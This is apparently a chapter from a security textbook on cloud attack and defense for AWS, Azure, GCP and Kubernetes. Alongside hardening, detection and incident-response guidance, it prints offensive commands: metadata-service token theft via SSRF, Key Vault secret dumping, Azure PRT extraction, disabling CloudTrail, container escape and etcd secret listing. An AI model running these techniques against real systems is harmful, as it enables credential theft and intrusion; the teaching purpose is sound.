Chapter 20: Cloud Attack and Defense¶
Overview¶
Cloud environments have transformed the attack surface from a defined perimeter into a fluid, API-driven ecosystem spanning multiple providers, accounts, and services. Cloud attacks exploit identity misconfigurations, overprivileged service principals, publicly exposed storage, and vulnerable serverless functions — often without deploying a single piece of malware. This chapter provides a comprehensive treatment of cloud attack techniques across AWS, Azure, and GCP, paired with corresponding detection and hardening strategies, native security services, and the shared responsibility model.
Learning Objectives¶
By the end of this chapter, students SHALL be able to:
- Describe the shared responsibility model and its security implications across IaaS, PaaS, and SaaS
- Enumerate and exploit common cloud misconfigurations in AWS, Azure, and GCP
- Implement cloud-native detection using CloudTrail, Azure Monitor, and GCP Audit Logs
- Design secure cloud architectures using principle of least privilege and defense-in-depth
- Perform cloud incident response and forensics across major providers
- Assess container and Kubernetes security posture
Prerequisites¶
- Familiarity with at least one cloud provider (AWS, Azure, or GCP)
- Understanding of IAM concepts (users, groups, roles, policies)
- Basic networking (VPC, subnets, security groups, firewalls)
Why This Matters
The Verizon DBIR 2024 found that misconfigured cloud storage has exposed billions of records. The top 5 AWS, Azure, and GCP misconfigurations are exploited within hours of deployment by automated scanner bots. In 2023, the MOVEit zero-day, Microsoft Exchange Online breach (Storm-0558), and CircleCI credential theft all originated from cloud control plane compromises. Cloud-native attacks often leave no malware footprint — pure identity abuse against APIs.
20.1 Shared Responsibility Model¶
graph TB
subgraph "Customer Responsibility"
D[Data]
A[Applications]
OS[Guest OS\nPatching]
NET[Network Config\nSecurity Groups]
IAM[IAM / Identity]
end
subgraph "Shared"
CONF[Configuration\nof Managed Services]
end
subgraph "Cloud Provider Responsibility"
PHYS[Physical Security\nof Data Centers]
HW[Hardware\n& Hypervisor]
NETF[Network\nFoundation]
PLAT[Managed Service\nPlatform]
end
style D fill:#e63946,color:#fff
style A fill:#e63946,color:#fff
style OS fill:#e63946,color:#fff
style NET fill:#e63946,color:#fff
style IAM fill:#e63946,color:#fff
style CONF fill:#f4a261,color:#000
style PHYS fill:#2d6a4f,color:#fff
style HW fill:#2d6a4f,color:#fff
style NETF fill:#2d6a4f,color:#fff
style PLAT fill:#2d6a4f,color:#fffThe most attacked layer is IAM — which is entirely customer-managed. Cloud providers secure the infrastructure; customers are responsible for who can access it and what they can do.
20.2 AWS Security¶
20.2.1 AWS Attack Techniques¶
1. Credential Exposure
# Detect exposed credentials in code
trufflehog github --org=TargetOrg --only-verified
# Validate credentials
aws sts get-caller-identity --profile exposed
# Enumerate permissions on compromised key
python3 enumerate-iam.py --access-key AKIA... --secret-key SECRET...
2. Instance Metadata Service (IMDSv1) Abuse via SSRF
# SSRF to IMDSv1 (no token required)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2InstanceRole
# Mitigation: Enforce IMDSv2 (requires token)
aws ec2 modify-instance-metadata-options --instance-id i-xxx \
--http-tokens required --http-put-response-hop-limit 1
3. S3 Bucket Misconfiguration
# Enumerate public buckets for target
aws s3 ls s3://target-bucket --no-sign-request
# S3Scanner — enumerate common bucket names
python3 s3scanner.py --bucket-file bucket_names.txt
# Download all public objects
aws s3 sync s3://exposed-bucket ./local-copy --no-sign-request
4. IAM Privilege Escalation
# Pacu — AWS exploitation framework
# 40+ privilege escalation methods enumerated by Rhinosecurity Labs
# Common escalation paths:
# iam:CreatePolicyVersion → replace inline policy with AdministratorAccess
# iam:PassRole + lambda:CreateFunction → create Lambda with Admin role
# iam:PassRole + glue:CreateDevEndpoint → attach Admin role to Glue endpoint
# sts:AssumeRole → assume role with higher privileges
# Manual check
aws iam list-policies --scope Local | python3 -c "
import sys,json
for p in json.load(sys.stdin)['Policies']:
print(p['Arn'], p['PolicyName'])"
5. CloudTrail Manipulation (Defense Evasion)
# Detect if CloudTrail logging is disabled (T1562.008)
aws cloudtrail get-trail-status --name myTrail
# Attacker would:
aws cloudtrail stop-logging --name myTrail
aws cloudtrail delete-trail --name myTrail
# Detection: AWS Config rule cloud-trail-enabled
# GuardDuty: UnauthorizedAccess:IAMUser/AnomalousBehavior
20.2.2 AWS Defense Architecture¶
graph TB
subgraph "Account Level"
CT[CloudTrail\nAll regions + S3 + KMS]
CW[CloudWatch\nLogs + Alarms]
SC[Security Hub\n+ Config Rules]
GD[GuardDuty\nThreat Detection]
end
subgraph "Identity Layer"
SCM[AWS SCPs\nOrganization Policies]
PB[Permission Boundaries]
IA[IAM Access Analyzer]
MFA[MFA Everywhere\n+ Hardware for Root]
end
subgraph "Network Layer"
VPC[VPC Flow Logs]
NW[Network Firewall]
WAF[WAF + Shield]
SG[Security Groups\nMinimum Access]
end
subgraph "Data Layer"
KMS[KMS Encryption\nAll Data at Rest]
MAC[Macie\nS3 Data Classification]
SEC[Secrets Manager\nNo Hardcoded Creds]
end
CT --> SIEM[SIEM / Security Analytics]
CW --> SIEM
VPC --> SIEM
GD --> SIEM
style SIEM fill:#e63946,color:#fff
style GD fill:#1d3557,color:#fff
style IA fill:#1d3557,color:#fff20.2.3 AWS Security Best Practices¶
| Category | Control | Implementation |
|---|---|---|
| Root Account | Disable root access keys | Console only; MFA hardware key |
| IAM | Least privilege policies | IAM Access Analyzer; no wildcard actions |
| Multi-Account | AWS Organizations + SCPs | Deny regions not in use; deny disable of CloudTrail |
| S3 | Block Public Access | Account-level Block All Public Access = ON |
| EC2 | IMDSv2 only | Launch template requirement |
| Secrets | Secrets Manager | Never in environment variables or code |
| Logging | CloudTrail all regions | S3 bucket with MFA delete + Glacier Vault Lock |
| Network | VPC Flow Logs | All VPCs; 90-day retention minimum |
20.3 Azure Security¶
20.3.1 Azure Attack Techniques¶
1. Service Principal and Application Registration Abuse
# Enumerate all service principals
az ad sp list --all | python3 -c "
import sys,json
for sp in json.load(sys.stdin):
print(sp['displayName'], sp.get('appRoles',''))"
# Find overprivileged app registrations
az role assignment list --all | python3 -c "
import sys,json
for ra in json.load(sys.stdin):
if 'Owner' in ra.get('roleDefinitionName','') or 'Contributor' in ra.get('roleDefinitionName',''):
print(ra)"
# Dump secrets from Azure Key Vault (if access)
az keyvault secret list --vault-name target-vault
az keyvault secret show --vault-name target-vault --name DatabasePassword
2. Azure AD Pass-the-PRT (Primary Refresh Token)
# AADInternals — extract PRT from Azure AD joined device
Import-Module AADInternals
Get-AADIntUserPRTToken
# Use PRT to get access token for any service
Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prt -Resource "https://management.azure.com/"
3. Managed Identity Abuse via SSRF
# SSRF to Azure Instance Metadata Service
curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
-H "Metadata: true"
# Use token to enumerate resources
curl -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01"
4. Storage Account Misconfiguration
# Azure Storage Explorer / CLI — access anonymous blobs
az storage container list --account-name targetaccount --auth-mode login
az storage blob list --container-name public-container --account-name targetaccount
# SAS token abuse
# Tokens in URLs, git history, or emails grant direct access
az storage blob list --account-name target --sas-token "?sv=2020-08-04&ss=b&..."
20.3.2 Azure Security Controls¶
| Service | Purpose | Key Features |
|---|---|---|
| Microsoft Defender for Cloud | CSPM + CWPP | Secure Score, threat detection, regulatory compliance |
| Azure Sentinel (Microsoft Sentinel) | SIEM + SOAR | Built-in analytics, incident management, UEBA |
| Azure AD Identity Protection | Identity risk detection | Risky sign-ins, risky users, MFA enforcement |
| Azure Policy | Governance | Deny non-compliant resources at deployment |
| Microsoft Defender for Identity | AD attack detection | Kerberoasting, pass-the-hash, lateral movement |
| Azure Firewall | Network egress control | FQDN filtering, threat intelligence-based filtering |
| Microsoft Entra PIM | JIT privileged access | Time-limited role activation; approval workflows |
20.4 GCP Security¶
20.4.1 GCP Attack Techniques¶
# Enumerate service account permissions
gcloud iam service-accounts list
gcloud projects get-iam-policy PROJECT --flatten="bindings[].members"
# Service account key extraction
gcloud iam service-accounts keys list --iam-account sa@project.iam.gserviceaccount.com
# Note: exported keys grant persistent access — rotate immediately if found
# GCS public bucket enumeration
gsutil ls gs://target-bucket/
curl https://storage.googleapis.com/target-bucket/
# Workload Identity abuse
# If compute instance has service account, query metadata:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
-H "Metadata-Flavor: Google"
20.4.2 GCP Security Services¶
| Service | Purpose |
|---|---|
| Security Command Center (SCC) | CSPM, threat detection, vulnerability management |
| Cloud Armor | WAF, DDoS protection |
| VPC Service Controls | API perimeter (prevent data exfiltration) |
| Cloud Audit Logs | Admin activity, data access, system events |
| BeyondCorp Enterprise | Zero-trust access to apps |
| Chronicle | Google's SIEM (petabyte-scale, 12-month retention) |
| Assured Workloads | Compliance (FedRAMP, HIPAA, IL4) |
20.5 Container and Kubernetes Security¶
20.5.1 Container Attack Surface¶
graph TB
subgraph "Container Threats"
E1[Escape via\nprivileged container]
E2[Host path\nmount abuse]
E3[Runtime\nRCE → escape]
E4[Image with\nembedded malware]
end
subgraph "Kubernetes Threats"
K1[Exposed kubectl\nAPI 6443/8080]
K2[RBAC\nmisconfiguration]
K3[Service account\ntoken abuse]
K4[etcd\ncompromise]
K5[Dashboard\nexposed]
end
subgraph "Supply Chain"
SC1[Malicious base\nimages]
SC2[Compromised\nCI/CD pipeline]
SC3[Dependency\nconfusion]
end
style E1 fill:#e63946,color:#fff
style K1 fill:#e63946,color:#fff
style K4 fill:#780000,color:#fff
style SC2 fill:#f4a261,color:#00020.5.2 Kubernetes Attack Techniques¶
# Enumerate cluster (from inside a pod)
# If automountServiceAccountToken=true and ClusterAdmin role:
kubectl --token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token) \
--server=https://kubernetes.default.svc \
--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
get secrets --all-namespaces
# Container escape via privileged container
# If running as privileged:
ls /proc/1/root # Can access host filesystem
nsenter --mount=/proc/1/ns/mnt -- /bin/bash
# Mount host path
# If hostPath volume mounted:
chroot /host bash
# Accessing etcd (stores all Kubernetes secrets unencrypted unless encryption at rest enabled)
etcdctl --endpoints=https://127.0.0.1:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
--key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
get / --prefix --keys-only
20.5.3 Kubernetes Hardening¶
# Pod Security Standards — enforce restricted profile
apiVersion: v1
kind: Namespace
metadata:
name: production
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/warn: restricted
---
# Network Policy — default deny all ingress/egress
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
namespace: production
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
---
# RBAC — minimal service account permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: app-role
namespace: production
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "list"]
# Only get/list specific configmaps — never wildcard
20.5.4 Container Security Tools¶
| Tool | Category | Purpose |
|---|---|---|
| Trivy | Image scanning | CVE detection in container layers and configs |
| Falco | Runtime security | Behavioral anomaly detection (CNCF) |
| Kube-bench | CIS benchmarking | Kubernetes CIS benchmark validation |
| kube-hunter | Penetration testing | Enumerate cluster attack surface |
| OPA Gatekeeper | Policy enforcement | Admission controller for policy-as-code |
| Checkov | IaC scanning | Terraform/Helm/CloudFormation misconfig detection |
| Cosign | Supply chain | Container image signing and verification |
20.6 Cloud Incident Response¶
20.6.1 Cloud IR Differences from On-Premises IR¶
| Aspect | On-Premises | Cloud |
|---|---|---|
| Evidence acquisition | Physical disk image | API-based log export |
| Volatile data | Memory dump of physical host | Memory forensics not available for managed services |
| Isolation | Unplug network cable | Modify security group, revoke IAM credentials |
| Log retention | Depends on SIEM | Cloud logs often 90 days default; must export to long-term storage |
| Identity trace | Windows Event IDs | API calls in CloudTrail/Azure Monitor/GCP Audit |
| Lateral movement | Pass-the-hash/ticket | Assume role, token theft |
20.6.2 AWS Incident Response Steps¶
# 1. Preserve evidence — export CloudTrail to S3 immediately
aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=compromised-user \
--start-time 2026-01-01T00:00:00Z --end-time 2026-01-15T23:59:59Z
# 2. Isolate compromised IAM entity
# Attach inline deny-all policy
aws iam put-user-policy --user-name compromised-user --policy-name QUARANTINE \
--policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Deny","Action":"*","Resource":"*"}]}'
# Deactivate access keys
aws iam update-access-key --access-key-id AKIA... --status Inactive
# 3. Identify all resources created/modified by compromised identity
aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=compromised-user \
| python3 -c "import sys,json; [print(e['EventName'],e['EventTime'],e.get('Resources','')) for e in json.load(sys.stdin)['Events']]"
# 4. Check for persistence mechanisms
aws iam list-access-keys # Additional keys created?
aws iam list-users # New users created?
aws lambda list-functions # Backdoor functions?
aws cloudformation list-stacks # New infrastructure?
20.6.3 Forensic Log Sources by Provider¶
| Provider | Service | Data | Retention Default |
|---|---|---|---|
| AWS | CloudTrail | API calls, S3 access | 90 days (Event history); unlimited in S3 |
| AWS | VPC Flow Logs | Network traffic metadata | Configurable |
| AWS | GuardDuty | Threat findings | 90 days |
| Azure | Activity Log | Control plane actions | 90 days |
| Azure | Sign-in Logs | Authentication events | 30 days (P2: 90 days) |
| Azure | Audit Logs | Azure AD changes | 30 days (P2: 90 days) |
| GCP | Cloud Audit Logs | Admin activity | 400 days |
| GCP | Data Access Logs | Data reads/writes | 30 days |
| GCP | VPC Flow Logs | Network metadata | Configurable |
20.7 Cloud Security Posture Management (CSPM)¶
CSPM tools continuously assess cloud configurations against security benchmarks (CIS, NIST, SOC2, PCI, HIPAA).
| Tool | Providers | Key Features |
|---|---|---|
| Prisma Cloud | AWS/Azure/GCP | CSPM + CWPP + CIEM, code-to-cloud |
| Wiz | AWS/Azure/GCP | Agentless, attack path analysis |
| Orca Security | AWS/Azure/GCP | SideScanning, no agents |
| Lacework | AWS/Azure/GCP | Behavioral anomaly + compliance |
| AWS Security Hub | AWS | Native, aggregates findings |
| Microsoft Defender for Cloud | Azure/multi-cloud | Native Azure + multicloud support |
| GCP Security Command Center | GCP | Native GCP CSPM + threat detection |
| Prowler | AWS/Azure/GCP | Open source, 300+ checks |
# Prowler — open source CSPM
pip3 install prowler
prowler aws --compliance cis_1.5_aws -R arn:aws:iam::123456789:role/ProwlerRole
# ScoutSuite — multi-cloud security auditing
python3 scout.py aws --profile default --report-dir ./report/
20.8 Benchmark Controls¶
| Control ID | Title | Requirement |
|---|---|---|
| Nexus SecOps-CLD-01 | Cloud Account Baseline Security | CIS benchmark Level 1+ for all cloud accounts |
| Nexus SecOps-CLD-02 | IAM Least Privilege | No wildcards in production policies; quarterly access review |
| Nexus SecOps-CLD-03 | Cloud Audit Log Retention | Minimum 12 months in immutable storage |
| Nexus SecOps-CLD-04 | CSPM Deployment | Continuous posture assessment across all cloud accounts |
| Nexus SecOps-CLD-05 | Container Security | Image scanning in CI/CD; runtime detection (Falco) in production |
| Nexus SecOps-CLD-06 | Cloud IR Playbook | Documented cloud incident response procedures tested annually |
Exam Prep & Certifications¶
Relevant Certifications
The topics in this chapter align with the following certifications:
- AWS Security Specialty — Domains: Infrastructure Security, Data Protection, Incident Response
- AZ-500 — Domains: Azure Security Technologies, Identity Protection, Platform Protection
- CCSP — Domains: Cloud Security Architecture, Data Security, Platform Security
Key Terms¶
CSPM (Cloud Security Posture Management) — Tools and practices that continuously assess cloud configurations for compliance violations and security misconfigurations.
CWPP (Cloud Workload Protection Platform) — Security for cloud workloads (VMs, containers, serverless) including vulnerability management and runtime protection.
IMDSv2 — Instance Metadata Service version 2 — an AWS improvement that requires a session token to access instance metadata, preventing SSRF-based metadata theft.
Lateral Movement (Cloud) — In cloud environments, lateral movement typically involves assuming IAM roles, stealing service account tokens, or pivoting between accounts in an AWS Organization.
Service Principal — An Azure Active Directory identity used by applications, services, and automation tools to access specific Azure resources with assigned permissions.
VPC Service Controls — A GCP security perimeter that restricts API access to specified Google Cloud services, preventing data exfiltration even if credentials are compromised.